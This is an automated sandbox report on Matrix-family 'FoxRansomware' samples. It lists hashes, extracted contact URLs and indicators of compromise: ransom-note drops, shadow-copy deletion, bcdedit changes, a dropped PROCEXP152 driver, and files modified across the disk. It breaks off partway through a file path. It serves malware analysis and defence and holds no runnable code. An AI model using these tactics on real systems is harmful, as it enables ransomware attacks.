Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
150s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
13-02-2024 05:15
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20231215-en
General
-
Target
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
-
Size
1.2MB
-
MD5
76b640aa00354e46b29ca7ac2adfd732
-
SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b
-
SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
-
SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
-
SSDEEP
24576:l/SA+2lraRrjSJR5ezmT1dM9tZBrPyvaNn:zXlabPyyN
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Users\Admin\Music\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jre7\lib\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Microsoft\MF\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\Admin\Favorites\Microsoft Websites\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\Admin\Favorites\MSN Websites\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\fr-FR\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightYellow\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jre7\lib\deploy\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jre7\lib\ext\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2160 bcdedit.exe 2456 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 2900 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS WMpaTI8a64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" WMpaTI8a64.exe -
Executes dropped EXE 3 IoCs
pid Process 2836 NWgYYjK7.exe 1716 WMpaTI8a.exe 1096 WMpaTI8a64.exe -
Loads dropped DLL 4 IoCs
pid Process 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 2416 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 2036 cmd.exe 1716 WMpaTI8a.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1636 takeown.exe -
resource yara_rule behavioral3/files/0x0006000000016d3a-1091.dat upx behavioral3/memory/1716-1363-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral3/memory/1716-7834-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\N: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\P: WMpaTI8a64.exe File opened (read-only) \??\U: WMpaTI8a64.exe File opened (read-only) \??\Z: WMpaTI8a64.exe File opened (read-only) \??\V: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\R: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\A: WMpaTI8a64.exe File opened (read-only) \??\Q: WMpaTI8a64.exe File opened (read-only) \??\U: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\Q: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\O: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\M: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\L: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\J: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\I: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\E: WMpaTI8a64.exe File opened (read-only) \??\S: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\N: WMpaTI8a64.exe File opened (read-only) \??\R: WMpaTI8a64.exe File opened (read-only) \??\S: WMpaTI8a64.exe File opened (read-only) \??\H: WMpaTI8a64.exe File opened (read-only) \??\K: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\O: WMpaTI8a64.exe File opened (read-only) \??\Y: WMpaTI8a64.exe File opened (read-only) \??\Y: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\G: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\B: WMpaTI8a64.exe File opened (read-only) \??\M: WMpaTI8a64.exe File opened (read-only) \??\T: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\H: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\E: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\J: WMpaTI8a64.exe File opened (read-only) \??\K: WMpaTI8a64.exe File opened (read-only) \??\T: WMpaTI8a64.exe File opened (read-only) \??\W: WMpaTI8a64.exe File opened (read-only) \??\W: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\X: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\G: WMpaTI8a64.exe File opened (read-only) \??\I: WMpaTI8a64.exe File opened (read-only) \??\X: WMpaTI8a64.exe File opened (read-only) \??\Z: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\V: WMpaTI8a64.exe File opened (read-only) \??\L: WMpaTI8a64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\GQhX6eMY.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BRCHUR11.POC 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281243.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14982_.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\107.accdt 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02124_.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0228823.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_GreenTea.gif 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152606.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281008.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MAIN.XML 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\logging.properties 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04385_.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\TAB_ON.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43B.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files 